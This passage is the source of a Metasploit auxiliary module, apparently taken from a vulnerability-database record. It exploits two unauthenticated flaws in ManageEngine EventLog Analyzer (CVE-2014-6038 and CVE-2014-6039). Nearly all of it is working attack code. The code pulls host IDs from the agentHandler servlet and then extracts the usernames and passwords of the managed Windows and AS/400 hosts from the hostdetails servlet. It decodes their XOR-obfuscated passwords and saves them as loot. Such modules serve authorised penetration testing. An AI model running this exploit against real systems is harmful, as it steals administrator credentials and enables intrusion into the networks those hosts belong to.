ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that\n allow an unauthenticated user to obtain the superuser password of any managed Windows and\n AS/400 hosts. This module abuses both vulnerabilities to collect all the available\n usernames and passwords. First the agentHandler servlet is abused to get the hostid and\n slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames\n and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,\n the TARGETURI has to be prepended with /event.\n },\n 'Author' =>\n [\n 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2014-6038' ],\n [ 'CVE', '2014-6039' ],\n [ 'OSVDB', '114342' ],\n [ 'OSVDB', '114344' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/12' ]\n ],\n 'DisclosureDate' => 'Nov 5 2014'))\n\n register_options(\n [\n Opt::RPORT(8400),\n OptString.new('TARGETURI', [ true, 'Eventlog Analyzer application URI (should be /event for version 7)', '/']),\n ])\n end\n\n\n def decode_password(encoded_password)\n password_xor = Rex::Text.decode_base64(encoded_password)\n password = ''\n password_xor.bytes.each do |byte|\n password << (byte ^ 0x30)\n end\n return password\n end\n\n\n def run\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'agentHandler'),\n 'method' =>'GET',\n 'vars_get' => {\n 'mode' => 'getTableData',\n 'table' => 'HostDetails'\n }\n })\n\n unless res && res.code == 200\n fail_with(Failure::NotFound, \"#{peer} - Failed to reach agentHandler servlet\")\n return\n end\n\n # When passwords have digits the XML parsing will fail.\n # Replace with an empty password attribute so that we know the device has a password\n # and therefore we want to add it to our host list.\n xml = res.body.to_s.gsub(/&#[0-9]*;/,Rex::Text.rand_text_alpha(6))\n begin\n doc = REXML::Document.new(xml)\n rescue\n fail_with(Failure::Unknown, \"#{peer} - Error parsing the XML, dumping output #{xml}\")\n end\n\n slid_host_ary = []\n doc.elements.each('Details/HostDetails') do |ele|\n if ele.attributes['password']\n # If an element doesn't have a password, then we don't care about it.\n # Otherwise store the slid and host_id to use later.\n slid_host_ary << [ele.attributes['slid'], ele.attributes['host_id']]\n end\n end\n\n cred_table = Rex::Text::Table.new(\n 'Header' => 'ManageEngine EventLog Analyzer Managed Devices Credentials',\n 'Indent' => 1,\n 'Columns' =>\n [\n 'Host',\n 'Type',\n 'SubType',\n 'Domain',\n 'Username',\n 'Password',\n ]\n )\n\n slid_host_ary.each do |host|\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'hostdetails'),\n 'method' =>'GET',\n 'vars_get' => {\n 'slid' => host[0],\n 'hostid' => host[1]\n }\n })\n\n unless res && res.code == 200\n fail_with(Failure::NotFound, \"#{peer} - Failed to reach hostdetails servlet\")\n end\n\n begin\n doc = REXML::Document.new(res.body)\n rescue\n fail_with(Failure::Unknown, \"#{peer} - Error parsing the XML, dumping output #{res.body.to_s}\")\n end\n\n doc.elements.each('Details/Hosts') do |ele|\n # Add an empty string if a variable doesn't exist, we have to check it\n # somewhere and it's easier to do it here.\n host_ipaddress = ele.attributes['host_ipaddress'] || ''\n\n ele.elements.each('HostDetails') do |details|\n domain_name = details.attributes['domain_name'] || ''\n username = details.attributes['username'] || ''\n password_encoded = details.attributes['password'] || ''\n password = decode_password(password_encoded)\n type = details.attributes['type'] || ''\n subtype = details.attributes['subtype'] || ''\n\n unless type =~ /Windows/ || subtype =~ /Windows/\n # With AS/400 we get some garbage in the domain name even though it doesn't exist\n domain_name = \"\"\n end\n\n msg = \"Got login to #{host_ipaddress} | running \"\n msg << type << (subtype != '' ? \" | #{subtype}\" : '')\n msg << ' | username: '\n msg << (domain_name != '' ? \"#{domain_name}\\\\#{username}\" : username)\n msg << \" | password: #{password}\"\n print_good(msg)\n\n cred_table << [host_ipaddress, type, subtype, domain_name, username, password]\n\n if type == 'Windows'\n service_name = 'epmap'\n port = 135\n elsif type == 'IBM AS/400'\n service_name = 'as-servermap'\n port = 449\n else\n next\n end\n\n credential_core = report_credential_core({\n password: password,\n username: username,\n })\n\n host_login_data = {\n address: host_ipaddress,\n service_name: service_name,\n workspace_id: myworkspace_id,\n protocol: 'tcp',\n port: port,\n core: credential_core,\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n create_credential_login(host_login_data)\n end\n end\n end\n\n print_line\n print_line(\"#{cred_table}\")\n loot_name = 'manageengine.eventlog.managed_hosts.creds'\n loot_type = 'text/csv'\n loot_filename = 'manageengine_eventlog_managed_hosts_creds.csv'\n loot_desc = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'\n p = store_loot(\n loot_name,\n loot_type,\n rhost,\n cred_table.to_csv,\n loot_filename,\n loot_desc)\n print_status \"Credentials saved in: #{p}\"\n end\n\n\n def report_credential_core(cred_opts={})\n # Set up the has for our Origin service\n origin_service_data = {\n address: rhost,\n port: rport,\n service_name: (ssl ? 'https' : 'http'),\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :service,\n module_fullname: self.fullname,\n private_type: :password,\n private_data: cred_opts[:password],\n username: cred_opts[:username]\n }\n\n credential_data.merge!(origin_service_data)\n create_credential(credential_data)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/eventlog_cred_disclosure.rb"}]}